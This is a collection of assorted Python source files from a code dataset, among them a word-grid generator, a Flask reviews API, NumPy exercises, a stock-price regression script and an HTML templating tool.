range(self.gridSize):\n if not intersectionBlock.in_pair(self.grid[intersectionBlockPosition[1]][i].pairId):\n self.grid[intersectionBlockPosition[1]][i] = Block(-1, False, \"\")\n if not intersectionBlock.in_pair(self.grid[i][intersectionBlockPosition[0]].pairId):\n self.grid[i][intersectionBlockPosition[0]] = Block(-1, False, \"\")\n\n # Return the block only if the block isn't in the pair we're currently expanding\n def getIfNotInPair(self, intersection, pairId, row, col):\n if not intersection.in_pair(pairId):\n return self.grid[row][col]\n else:\n return Block(-1, False, \"\")\n\n # Add buffers to the left and top of the current grid\n def add_buffer(self):\n size = self.numPairs\n\n for i in range(size):\n self.grid.insert(0, [None for _ in range(self.gridSize)])\n\n self.gridSize += size\n for i in range(self.gridSize):\n for j in range(size):\n self.grid[i].insert(0, None)\n\n def __str__(self):\n all = \"\"\n for row in range(0, self.gridSize):\n line = \"\"\n for col in range(0, self.gridSize):\n word = self.grid[row][col].letter\n if self.grid[row][col].pairId == -1:\n word = \"-\"\n line = line + word + \" \"\n all += line + \"\\n\"\n return all\n\n def display_pairs(self):\n for pair in self.pairs:\n print(pair.horizontal_word + \" \" + pair.vertical_word + \" \")\n\n def init_grid(self):\n return [[None for _ in range(self.gridSize)] for i in range(self.gridSize)]\n\n def init_pairs(self):\n return [Pair(self.word_list) for _ in range(self.numPairs)]\n\n\nclass Block:\n def __init__(self, pair_id, intersection, letter):\n self.pairId = pair_id\n self.intersection = intersection\n self.letter = letter\n\n def empty(self):\n return self.pairId == -1\n\n def in_pair(self, pair_id):\n return self.pairId == pair_id\n\nclass Pair:\n # word1 will be horizontal\n # word2 will be vertical\n\n def __init__(self, word_list):\n self.word_list = word_list\n self.horizontal_word, self.vertical_word = self.init_words()\n self.intersect = self.intersection()\n self.horizontal_word_x = None\n self.horizontal_word_y = None\n self.vertical_word_x = None\n self.vertical_word_y = None\n\n def init_words(self, tries=100):\n horizontal_word = random.choice(self.word_list)\n self.word_list.remove(horizontal_word)\n while tries > 0:\n random_word = random.choice(self.word_list)\n distinct_letters = len(set(horizontal_word + random_word))\n valid = len(set(horizontal_word)) + len(set(random_word)) != distinct_letters\n if valid:\n vertical_word = random_word\n self.word_list.remove(vertical_word)\n horizontal_word = horizontal_word.lower()\n vertical_word = vertical_word.lower()\n return horizontal_word, vertical_word\n tries -= 1\n\n def in_pair(self, row, col):\n return self.in_word1(row, col) or self.in_word2(row, col)\n\n def in_word1(self, row, col):\n return row == self.horizontal_word_y and self.horizontal_word_x <= col < self.horizontal_word_x + len(self.horizontal_word)\n\n def in_word2(self, row, col):\n return col == self.vertical_word_x and self.vertical_word_y <= row < self.vertical_word_y + len(self.vertical_word)\n\n def intersection(self):\n temp = list(self.horizontal_word)\n random.shuffle(temp)\n for char in temp:\n if char in self.vertical_word:\n return self.horizontal_word.find(char), self.vertical_word.find(char)\n\n def swap_words(self):\n self.horizontal_word, self.vertical_word = self.vertical_word, self.horizontal_word\n\n def set_pos(self, word1x, word1y, word2x, word2y):\n self.horizontal_word_x = word1x\n self.horizontal_word_y = word1y\n self.vertical_word_x = word2x\n self.vertical_word_y = word2y\n\n\n\n\nw = WordSearch(2, 5)\nw.fill_grid()\nprint(w)\nw.display_pairs()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"508483325","text":"import wx\n\napp = wx.App()\n\nframe = wx.Frame(None, title = \"taylor's list\")\n \nbkg = wx.Panel(frame)\n\nopenButton = wx.Button(bkg, label = 'open')\nsaveButton = wx.Button(bkg, label = 'save')\nfilename = wx.TextCtrl(bkg)\ncontents = wx.TextCtrl(bkg, style = wx.HSCROLL | wx.TE_MULTILINE)\n\nhbox = wx.BoxSizer()\nhbox.Add(filename, proportion = 1, flag = wx.EXPAND, border = 5)\nhbox.Add(openButton, proportion = 0, flag = wx.LEFT, border = 5)\nhbox.Add(saveButton, proportion = 0, flag = wx.LEFT, border = 5)\n\nbbox = wx.BoxSizer(wx.VERTICAL)\nbbox.Add(hbox, proportion = 0, flag = wx.EXPAND | wx.ALL)\nbbox.Add(contents, proportion = 1, flag = wx.EXPAND | wx.LEFT | wx.BOTTOM | wx.RIGHT, border = 5)\n\nbkg.SetSizer(bbox)\n#frame.Centre\nframe.Show()\n\napp.MainLoop()\n","sub_path":"base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"645703657","text":"\nsett = set()#a global variable\n\ndef permute(s, chosen=[]):\n global sett#this stmt reqrd when we write access global var\n #above stmt not reqrd for read access of global var\n if len(s) == 0:\n sett.add(''.join(chosen))\n # print(''.join(chosen))\n else:\n for i in range(len(s)):\n #choose\n ch = s[i]\n chosen.append(ch)\n s.pop(i)\n #explore\n permute(s, chosen)\n #unchoose\n s.insert(i, ch)\n chosen.pop()\n\n\npermute(list('aabc'))\nprint(sett)","sub_path":"string_perm.py","file_name":"string_perm.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"623388853","text":"import cgi\nimport datetime\n\nimport kgi\n\nfrom emapps.util import require_permission\nfrom emapps.util import eve_time\n\ndef forumsapp(environ, start_response):\n \"\"\"\n Main application interface. Dispatch over pages.\n \"\"\"\n URLCONF = [\n ('^/reputation/', view_reputation),\n ]\n return kgi.dispatch(environ, start_response, URLCONF)\n\n@require_permission('em')\ndef view_reputation(environ):\n db = kgi.connect('dbforums')\n c = db.cursor()\n c.execute(\"SELECT u.uid, u.username, addu.uid, addu.username, \"\n \" r.reputation, r.dateline, r.comments, r.pid \"\n \"FROM mybb_reputation r \"\n \" INNER JOIN mybb_users u ON r.uid = u.uid \"\n \" INNER JOIN mybb_users addu ON r.adduid = addu.uid \"\n \"ORDER BY r.dateline DESC \"\n \"LIMIT 23\")\n reputation = [(uid, username, adduid, addusername, reputation,\n datetime.datetime.utcfromtimestamp(dateline),\n comments, pid)\n for (uid, username, adduid, addusername, reputation,\n dateline, comments, pid)\n in c.fetchall()]\n return kgi.template_response('forums/reputation.html',\n user=environ[\"emapps.user\"],\n reputation=reputation)\n\n","sub_path":"lib/emapps/forums/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"109381616","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import, unicode_literals\n\nimport logging\nimport os\nfrom logging.handlers import RotatingFileHandler\n\n# logger settings\nfrom config import DEBUG\n\nLOG_PATH = os.getenv(\"LOG_FILE_PATH\", \"/var/log/\")\nos.makedirs(LOG_PATH, exist_ok=True)\nlog_file = os.path.join(LOG_PATH, '{}.log'.format(\"recommend\"))\n\nLOG_LEVEL = logging.DEBUG if DEBUG else logging.INFO\nfile_handler = RotatingFileHandler(log_file, maxBytes=1024 * 1024 * 10, backupCount=5)\nfile_handler.setLevel(LOG_LEVEL)\nconsole = logging.StreamHandler()\nconsole.setLevel(LOG_LEVEL)\n\nlogging.basicConfig(\n level=LOG_LEVEL,\n format='%(asctime)s [%(levelname)s] [%(filename)s:%(lineno)s] [%(funcName)s] %(message)s',\n handlers=[file_handler, console]\n)\n","sub_path":"utils/logutils.py","file_name":"logutils.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"345477867","text":"import urllib.request\nimport re\n\nquery = \"moves like jaggers\"\n\ndef search_yt(a):\n a = a.replace(' ','+')\n html = urllib.request.urlopen(\"https://www.youtube.com/results?search_query=\"+a)\n decoded = html.read().decode()\n video_ids = re.findall(\"watch\\?v=(\\S{11})\", decoded)\n return video_ids\n \nvideo_ids = search_yt(query)\nfor id in video_ids:\n print('https://www.youtube.com/watch?v='+id)\n","sub_path":"Python/get-youtube-results/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"473606605","text":"class Message:\n\n def __init__(self, message=None, callback=None):\n if (message is None) and not(callback is None):\n self.callback = callback\n self.content = callback.data\n self.id = callback.message.message_id\n self.user_id = callback.from_user.id\n self.type = 'callback'\n elif not(message is None) and (callback is None):\n self.message = message\n self.content = message.text\n self.id = message.message_id\n self.user_id = message.from_user.id\n self.type = 'message'\n def is_restart(self):\n restart_arr = ['restart','/restart','start','/start','заново','старт','рестарт','меню','начало']\n for cmd in restart_arr:\n if cmd in self.content.lower():\n return True\n if self.type == 'callback' and '/start ' in self.content:\n return True\n return False\n\n def is_backbutton(self):\n if self.type == 'callback' and self.content == 'back':\n return True\n return False\n\n def is_nan(self):\n if self.type == 'callback' and self.content.lower() in ['none','null','nan','nil']:\n return True\n else:\n return False\n\n def get_referal(self):\n if '/start ' in self.content:\n if len(self.content) > 7:\n return self.content[8:]\n else:\n return None\n else:\n return None\n","sub_path":"settings/Messages.py","file_name":"Messages.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"525331982","text":"#!/usr/bin/python3\n\"\"\"module: reviews\ncontains flask api routing for Review object queries\"\"\"\nfrom api.v1.views import app_views\nfrom flask import abort, jsonify, request\nimport json\nfrom models import storage\nfrom models.state import State\nfrom models.city import City\nfrom models.place import Place\nfrom models.review import Review\n\n\n@app_views.route('/places//reviews',\n methods=['GET'], strict_slashes=False)\ndef view_reviews(place_id):\n \"\"\"returns list of reivews for a given place\"\"\"\n linked_place = storage.get(\"Place\", place_id)\n if linked_place is None:\n abort(404)\n review_list = [val.to_dict() for val in storage.all(\"Review\").values()]\n reviews = [review for review in review_list\n if review['place_id'] == place_id]\n return jsonify(reviews)\n\n\n@app_views.route('/reviews/', methods=['GET'], strict_slashes=False)\ndef view_one_review(review_id):\n \"\"\"returns one review\"\"\"\n a_review = storage.get(\"Review\", review_id)\n if a_review is None:\n abort(404)\n return jsonify(a_review.to_dict())\n\n\n@app_views.route('/reviews/', methods=['DELETE'],\n strict_slashes=False)\ndef delete_review(review_id):\n \"\"\"delete a review\"\"\"\n review_delete = storage.get(\"Review\", review_id)\n if review_delete is None:\n abort(404)\n storage.delete(review_delete)\n storage.save()\n return jsonify({}), 200\n\n\n@app_views.route('/places//reviews',\n methods=['POST'], strict_slashes=False)\ndef add_review(place_id):\n \"\"\"add a review to storage\"\"\"\n linked_place = storage.get(\"Place\", place_id)\n if linked_place is None:\n abort(404)\n new_review = request.get_json()\n if new_review is None:\n return jsonify({'error': \"Not a JSON\"}), 400\n # new_review is a dict\n if new_review.get(\"user_id\") is None:\n return jsonify({'error': \"Missing user_id\"}), 400\n\n linked_user = storage.get(\"User\", new_review.get(\"user_id\"))\n if linked_user is None:\n abort(404)\n if new_review.get(\"text\") is None:\n return jsonify({'error': \"Missing text\"}), 400\n new_review['place_id'] = place_id\n new_review = Review(**new_review)\n new_review.save()\n return jsonify(new_review.to_dict()), 201\n\n\n@app_views.route('/reviews/', methods=['PUT'], strict_slashes=False)\ndef update_review(review_id):\n \"\"\"update a review & save the updates to storage\"\"\"\n review_data = request.get_json()\n if review_data is None:\n return jsonify({'error': \"Not a JSON\"}), 400\n\n # check if review_id is valid\n review_update = storage.get(\"Review\", review_id)\n if review_update is None:\n abort(404)\n no_updates = ['id', 'user_id', 'place_id', 'created_at', 'updated_at']\n for attr, value in review_data.items():\n if attr in no_updates:\n pass\n else:\n setattr(review_update, attr, value)\n review_update.save()\n return jsonify(review_update.to_dict()), 200\n","sub_path":"api/v1/views/places_reviews.py","file_name":"places_reviews.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"419211231","text":"# Aufgabe 1 (Ausfuehren von Mathematischen Funktionen auf Listenelemente)\n\"\"\"Gegeben ist die Liste mit dem Namen \"list1\"\nBerechnen sie den Cosinus Wert von jedem Eintrag in der liste und speichern sie\ndas Ergebnis in \"list2\"\nBonus fuer die Pros: Verwenden Sie keine for-Schleife.\"\"\"\nlist1 = [1, 2, 3.14, 3.14/2]\n\n\n# Aufgabe 2\n\"\"\" Erstellen sie einen numpy-array so wie er auf der Powerpoint Folie \nabgebildet ist\"\"\"\n\n# Aufgabe 2.1\n\"\"\"Verwenden Sie den numpy-array aus Aufgabe 2 und berechnen Sie den Cosinus \nWert von jedem Element.\"\"\"\n\n\n# Aufgabe 3 (Erstellen einer Matrix)\n\"\"\" Erstellen sie einen numpy-array mit folgenden Dimensionen (3,5)\nJedes Element des Arrays/Matrix hat den Wert 0 \"\"\"\n\n\n# Aufgabe 4 \n\"\"\" Erstellen sie einen numpy-array mit folgenden Dimensionen (2,5)\nJedes Element des Arrays/Matrix hat den Wert 1 \"\"\"\n\n\n# Aufgabe 5\n\"\"\" Erstellen sie einen numpy-array mit folgenden Dimensionen (2,5)\nJedes Element des Arrays/Matrix hat den Wert 6 \"\"\"\n\n\n# Aufgabe 6 (Reshape)\n\"\"\" Erstellen sie einen numpy-array mit folgenden Dimensionen (3,3)\nDas erste Element ist 0, das zweite 1, das dritte 2 usw. Gehen sie wie folgt \nvor:\n1) Verwenden sie die numpy Funktion arange um eine Zahlenfolge \n im numpy Format zu erstellen\n2) Verwenden Sie die numpy Funktion reshape um aus dem 1D array einen array\n mit Dimension (3,3) zu ersetllen\"\"\"\n \n\n# Aufgabe 7 (Array manipulation)\n\"\"\" Gegeben ist der Untenstehende 1D array \"bsp_array1\", aendern sie das \nElement das die Zahl 7 hat in die Zahl 17 um\"\"\"\nbsp_array1=np.arange(8)\n\n\n# Aufgabe 8 \n\"\"\" Gegeben ist der Untenstehende 2D array \"bsp_array2\", aendern sie das \nElement das die Zahl 7 hat, in die Zahl 17 um\"\"\"\nbsp_array2=np.reshape(np.arange(8),[4,2])\n\n\n# Aufgabe 9\n\"\"\" Gegeben ist der Untenstehende 3D array \"bsp_array3\", aendern sie das \nElement das die Zahl 7 hat in die Zahl 17 um\"\"\"\nbsp_array3=np.reshape(np.arange(24),[4,3,2])\n\n\n# Aufgabe 10 (Array slicing)\n\"\"\" Gegeben ist der Untenstehende 1D array \"bsp_array4\", Erstellen Sie einen \nneuen 1D array \"sub_array4\" der die letzten 3 Elemente von \"bsp_array4\"\nbeinhaltet\"\"\"\nbsp_array4=np.arange(16)\n\n\n# Aufgabe 11\n\"\"\" Gegeben ist der Untenstehende 3D array \"bsp_array5\", \n Erstellen Sie einen neuen 1D array \"sub_array5\" der die Elemente \n [ 4, 10, 16, 22] beinhaltet. Erstellen Sie den sub_array5 in abhaengigkeit von\n bsp_array5 Verwenden sie die slicing Methode\"\"\"\nbsp_array5=np.reshape(np.arange(24),[4,3,2])\n\n\n# Aufgabe 12 (Matrix multiplication)\n\"\"\" Multiplizieren Sie die 2 Matrizen \"mat1\" und \"mat2\" mit einander\"\"\"\nmat1=np.reshape(np.arange(0,6),[2,3])\nmat2=np.reshape(np.arange(6,18),[3,4])\n\n\n# Aufgabe 13\n\"\"\" Multiplizieren Sie die 2 Matrizen \"mat3\" und \"mat4\" Elementweise mit \neinander\n\"\"\"\nmat3=np.reshape(np.arange(0,6),[2,3])\nmat4=np.reshape(np.arange(6,12),[2,3])\n\n\n# Aufgabe 14\n\"\"\" Mulitplizieren Sie jede Zeile von \"mat5\" Elementweise mit dem Vector \"vec1\"\n\"\"\"\nmat5=np.reshape(np.arange(12),[3,4])\nvec1=np.reshape(np.arange(4),[1,4])\n\n\n# Aufgabe 15\n\"\"\"Aufgabe fuer die Pros:\nGegeben ist die untenstehende Matrix. Berechnen Sie die Eigenwerte und \nEigenvektoren fuer diese Matrix.\"\"\"\nmat6=np.reshape(np.arange(9),[3,3])\n\n\n\n","sub_path":"P09_Numpy.py","file_name":"P09_Numpy.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"628702511","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\nfrom .viewsets import (\n BillViewSet,\n OrderViewSet,\n PaymentMethodViewSet,\n SellerOrderViewSet,\n)\n\nrouter = DefaultRouter()\nrouter.register(\"order\", OrderViewSet)\nrouter.register(\"paymentmethod\", PaymentMethodViewSet)\nrouter.register(\"bill\", BillViewSet)\nrouter.register(\"sellerorder\", SellerOrderViewSet)\n\nurlpatterns = [\n path(\"\", include(router.urls)),\n]\n","sub_path":"backend/checkout/api/v1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"441413899","text":"from doc_curation import blog\nfrom curation_utils import scraping\nimport logging\n\nfor handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\nlogging.basicConfig(\n level=logging.DEBUG,\n format=\"%(levelname)s:%(asctime)s:%(module)s:%(lineno)d %(message)s\")\nlogging.getLogger('charsetgroupprober').setLevel(logging.WARNING)\nlogging.getLogger(\"charsetgroupprober\").propagate = False\nlogging.getLogger('sbcharsetprober').setLevel(logging.WARNING)\nlogging.getLogger(\"sbcharsetprober\").propagate = False\n\n\ndef free_article_filter(anchor):\n lock_tags = anchor.parent.select(\".audience-lock\")\n if len(lock_tags) == 0:\n return True\n return False\n\n\ndef scrape_free_articles_from_index_anchors(url, dir_path, dry_run=False):\n browser = scraping.get_selenium_chrome(headless=True)\n article_scraper = lambda url, dir_path, dry_run: blog.scrape_post_markdown(url=url, dir_path=dir_path, dry_run=dry_run, entry_css_list=[\".single-post\", \"div.body.markup\"])\n blog.scrape_index_from_anchors(url=url, dir_path=dir_path, entry_css_list=[], anchor_css=[\"a.post-preview-title\", \".portable-archive-list a\"], article_scraper=article_scraper, urlpattern=\".*/p/[^/]+/?$\", anchor_filter=free_article_filter, browser=browser, dry_run=dry_run)\n","sub_path":"doc_curation/blog/substack.py","file_name":"substack.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"511909103","text":"import pandas as pd\nimport numpy as np\nimport quandl, math, datetime\nfrom sklearn import preprocessing, svm\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nimport matplotlib.pyplot as plt\nimport pickle\nfrom matplotlib import style\nstyle.use('ggplot')\n\n# Get stock data from quandl\ndf = quandl.get(\"WIKI/GOOGL\", api_key='oH7knqk13pDCADDcQZsx')\n\n# Calculate some custom features\ndf['HL_PCT'] = (df['Adj. High'] - df['Adj. Low']) / df['Adj. Close'] * 100\ndf['PCT_change'] = (df['Adj. Close'] - df['Adj. Open']) / df['Adj. Open'] * 100\n\n# Create a new dataframe holding the features we want to use\ndf = df[['Adj. Close', 'HL_PCT', 'PCT_change', 'Adj. Volume']]\n\n# Select the column we would like to forecast\nforecast_col = 'Adj. Close'\n\n# Fill missing data with clear outliers to avoid influencing data\ndf.fillna(-99999, inplace=True)\n\n#set the distance into the future we want to predict\nforecast_out = int(math.ceil(0.01 * len(df)))\n\n# Create the Truth column\ndf['label'] = df[forecast_col].shift(-forecast_out)\n\n\n# X is the array containing all of our data features\nX = np.array(df.drop(['label'], 1))\nX = preprocessing.scale(X)\nX = X[:-forecast_out] # \nX_lately = X[-forecast_out:]\n\n\n# Drop any records missing info\ndf.dropna(inplace=True)\n\n#y contains our labels / Truth values\ny = np.array(df['label'])\n\n# This is optional based on practicality. Scales the feautres to make the model work better.\n\n\n# Split the data into training and test sets\n# 20% of the data is set aside as testing data. We don't train on the testing data so that we\n# can effectively test our model for overfitting\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n\n# instantiate a classifer\nclf = LinearRegression()\n\n#Uncomment the following line to switch to SVM:\n# The SVM is much worse on this data than linear regression.\n#clf = svm.SVR()\n\n# Train / fit the model to the training data\nclf.fit(X_train, y_train)\n\n# Save the classifier for future use\n# potentially implement a loop to train a bunch of networks, track the\n# maximum efficiency, and save that one to disk...\n# creates a pickle file to store the classifier in using the dump function\n'''\nwith open('linearregression.pickle', 'wb') as f:\n pickle.dump(clf, f)\n\n# Load a previously saved classifer.\npickle_in = open('linearregression.pickle', 'rb')\nclf = pickle.load(pickle_in)\n'''\n\n# Evaluate our model against the test data we set aside and print the accuracy.\naccuracy = clf.score(X_test, y_test)\n\nforecast_set = clf.predict(X_lately)\n\nprint(forecast_set, accuracy, forecast_out)\n\ndf['Forecast'] = np.nan\nlast_date = df.iloc[-1].name\nlast_unix = last_date.timestamp()\none_day = 86400\nnext_unix = last_unix + one_day\n\nfor i in forecast_set:\n next_date = datetime.datetime.fromtimestamp(next_unix)\n next_unix += one_day\n df.loc[next_date] = [np.nan for _ in range(len(df.columns)-1)] + [i]\n\ndf['Adj. Close'].plot()\ndf['Forecast'].plot()\nplt.legend(loc=4)\nplt.xlabel('Date')\nplt.ylabel('Price')\nplt.show()\n","sub_path":"linearregression/stock1.py","file_name":"stock1.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"83756075","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom . import _compiler as compiler\nfrom . import console\nimport os, re, sys\n\n__version__ = (1, 0)\n__all__ = [\"render\", \"hammer\", \"get_all_files\", \"get_build_output\", \"Mode\", \"Remarkup\"]\n\nclass Remarkup:\n def __init__(self):\n pass\n __version__ = (1, 0)\n\nconsole.aware(\"Frame Studios -- Sledge\")\n\nnullstr = \"\"\n\nshould_return = False\n# root # curdir\nbasespace = workshop = nullstr\n\nframerc = {}\nignore = ()\n_filter = ()\n\nconfile = \".framerc\"\next = \".html\"\nn = \"\\n\"\n\nstatus = [\"sorry it failed. Check to see if you left \\\nsome nails in your pocket\", \"completed\"]\n\nIndexer = None\n_mode = None\n\n_ptrns = [r\"(?:\\..+)$\", r\"([ \\t]*)\\$\\{FRAME::BODY\\}\", \n r\"[ \\t]*\\$\\{FRAME::BODY\\}\", r\"\\$\\{FRAME::TITLE\\}\", \n r\"\\$\\{FRAME::BODY\\}\", r\"\\$\\{FRAME::LASTMOD\\}\", \n r\"\\$\\{FRAME::METAS::%s\\}\"]\n\n\nfeedout = nullstr\n\n# \nclass Mode:\n def __init__(self):\n raise TypeError('object of type enum cannot be instatiated')\n DIR_MODE = compiler.Compiler.DIR_MODE\n FILE_MODE = compiler.Compiler.FILE_MODE\n LAYOUT_MODE = compiler.Compiler.LAYOUT_MODE\n\n\ndef recurseAddress(o, x, i=0):\n try:\n return o[x[i]] if i == (len(x) - 1) else recurseAddress(o[x[i]], x, i+1)\n except KeyError:\n console.warn(\"value at address '{}' is null-string\".format(x))\n return None\n\ndef specifics(frameup, pane):\n allFormat = re.findall(r\"([ \\t]*)\\x24\\x7B(.+?)\\x7D(?:\\x5B([\\d*]+)\\x5D)?\", frameup)\n for tab, each, index in allFormat:\n each_ = each.lstrip().split(\"::\")\n if each_[1] != \"METAS\":\n each_ = each_[1:]\n else:\n each_ = ['meta'] + each_[2:]\n paneValue = recurseAddress(pane, each_, 0)\n if paneValue is None:\n console.warn(\"could not resolve address \\\"{}\\\"\".format(each))\n paneValue = nullstr\n if type(paneValue) is list:\n index = str(index)\n index = int(index) if index.isdigit() else index\n ptrn = u\"%s\\x24\\x7B%s\\x7D\\x5B%s\\x5D\"%(tab, each, index)\n if index == \"*\" or index == \"\":\n paneValue = \", \".join(paneValue)\n paneValue = _doTabs(paneValue, tab)\n frameup = frameup.replace(ptrn, paneValue)\n else:\n paneValue = paneValue[index]\n paneValue = _doTabs(paneValue, tab)\n frameup = frameup.replace(ptrn, paneValue)\n else:\n paneValue = _doTabs(paneValue, tab)\n ptrn = u\"%s\\x24\\x7B%s\\x7D\"%(tab,each)\n frameup = frameup.replace(ptrn, paneValue)\n return frameup\n\ndef render(src, mode=Mode.DIR_MODE):\n global _mode \n _mode = mode\n fname = src if mode & 3 else None\n if src is None or src == nullstr:\n console.warn(\"nothing to build\")\n return None\n fr = compiler.Compiler()\n fr.inform(mode, fname, basespace, workshop, framerc)\n return fr.compile(src, mode)\n\ndef get_all_files(basedir, ignore=None, _filter=None):\n global workshop, feedout, basespace\n import fnmatch\n if _filter is None or ignore is None:\n # it should never come to this\n raise TypeError(\"expected filter and ignore to be of type 'list' got 'NoneType'\")\n ignore = [os.path.join(basespace, d) for d in ignore]\n ignore = [''] if len(ignore) < 1 else ignore\n\n allfiles = os.listdir(basedir)\n dirsOnly = os.listdir(basedir)\n temp = []\n workshop = basedir\n\n for n in range(len(ignore)):\n for eachfile in allfiles:\n abs_eachfile = os.path.join(basedir, eachfile)\n if os.path.isfile(abs_eachfile) and not fnmatch.fnmatch(abs_eachfile, ignore[n]):\n temp.append(eachfile)\n dirsOnly.remove(eachfile)\n for i in range(len(_filter)):\n for each in temp:\n if fnmatch.fnmatch(each, _filter[i]): # allow globs pattern matching\n feedout = _build(each, render(os.path.join(basedir, each)))\n for j in range(len(ignore)):\n for eachdir in dirsOnly:\n abs_eachdir = os.path.join(basedir, eachdir)\n if os.path.isdir(abs_eachdir) and not fnmatch.fnmatch(abs_eachdir, ignore[j]): # allow globs pattern matching\n get_all_files(os.path.join(basedir, eachdir), ignore, _filter) # recurse\n del allfiles, temp # insignificant though\n\ndef _build(filename, response):\n global Indexer, _mode\n if _mode == Mode.DIR_MODE:\n Indexer = response['INDEXER']\n if response is None:\n return\n fileo = nfc = None\n dest = cLayoutFrame = genHTMLFile = None\n cMainFrame = response['PAGE']\n if not response['LAYOUT_FILE'] is None:\n cLayoutFrame = render(response['LAYOUT_FILE'], Mode.LAYOUT_MODE)\n dest = response['DEST']\n specific = response['UNIQUE']\n specific['PATH_PREFIX'] = response['PATH_PREFIX']\n fname = re.sub(_ptrns[0], ext, filename)\n if not should_return and not dest is None:\n genHTMLFile = os.path.join(workshop, dest, fname)\n if not cLayoutFrame is None:\n tab = re.search(_ptrns[1], cLayoutFrame).group(1) # query the current tab order\n cMainFrame = _doTabs(cMainFrame, tab) # pad tabs according to tab order\n nfc = re.sub(_ptrns[2], cMainFrame, cLayoutFrame) # layout body\n nfc = re.sub(_ptrns[3], specific[\"title\"], nfc) # page title\n nfc = specifics(nfc, specific) # all defered variables\n else:\n nfc = cMainFrame\n if should_return or not genHTMLFile:\n return nfc\n try:\n fileo = open(genHTMLFile, 'w')\n fileo.write(nfc)\n except IOError as ex:\n console.error(\"could not open file '{}'\".format(genHTMLFile))\n finally:\n fileo.close()\n check = re.search(_ptrns[4], nfc)\n if check == None:\n console.success(status[1])\n sys.stdout.flush()\n else:\n console.error(status[0])\n return 0\n\ndef _doTabs(context=nullstr, tab=nullstr):\n codeframe = False\n lctx = context.split(n)\n nctx = r''\n for each in lctx:\n check = each.lstrip().rstrip()\n codecheck = check.startswith(\"\") or check.endswith(\" \")\n if ncodecheck:\n codeframe = False\n if not codeframe:\n nctx += \"%s%s\\n\"%(tab,each)\n else:\n nctx += \"%s\\n\"%(each)\n if codecheck:\n codeframe = True\n return nctx.rstrip()\n\ndef _metas(x, c):\n if type(x) is str:\n yield re.sub(_ptrns[6]%(r\".+?\"), x, c)\n return\n for key, value in x.items():\n if not value:\n yield nullstr\n return\n c = re.sub(_ptrns[6]%key, value, c)\n yield c\n\ndef hammer(workspace=os.path.dirname(\n os.path.abspath(__file__)), watch=False,\n verbose=False, ret=False):\n global basespace, feedout, should_return\n global framerc, confile, Indexer\n if ret and watch:\n console.error(\"you can't watch while expecting a return value\")\n sys.exit(1)\n if not os.path.exists(workspace):\n console.error('the specified path could not be found')\n sys.exit(3)\n import json\n default_conf = \"\"\"{\n \"ignore\":[\"*.sledge/\"],\n \"filter\":[\"*.frame\"],\n \"dest\": {\n \"path\": \"../../build\",\n \"rel_to_pages_root\": true\n }\n }\"\"\"\n framerc.update(json.loads(default_conf))\n\n should_return = ret\n if os.path.isfile(workspace):\n basespace = os.path.dirname(workspace)\n feedout = _build(os.path.basename(workspace), render(workspace, mode=Mode.FILE_MODE))\n return\n basespace = workspace\n\n \n confile = os.path.join(workspace, confile)\n confile = open(confile).read() if os.path.exists(confile) else default_conf\n framerc.update(json.loads(confile))\n\n ignore = framerc['ignore']\n _filter = framerc['filter']\n\n get_all_files(workspace, ignore, _filter)\n\n if watch:\n import watchdog.observers\n from .utils import vigilante\n\n class callbacks:\n def __init__(self):\n pass\n @staticmethod\n def build(filename, response):\n return _build(filename, response)\n @staticmethod\n def renderer(src, mode):\n return render(src, mode)\n\n handler = vigilante.Vigilante(_filter, ignore, Indexer, callbacks, Mode)\n path_to_watch = os.path.normpath(os.path.join(workspace, '..'))\n ob = watchdog.observers.Observer()\n ob.schedule(handler, path=path_to_watch, recursive=True)\n ob.start()\n import time\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n ob.stop()\n Indexer.close()\n #sys.exit(1)\n ob.join()\n\ndef get_build_output():\n \"\"\" returns the output of the build as text instead of writing out to file\n after calling `sledge.hammer(..., ret=True)`\n then `my_page = sledge.get_build_output()`\"\"\"\n return feedout\n","sub_path":"scripts/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
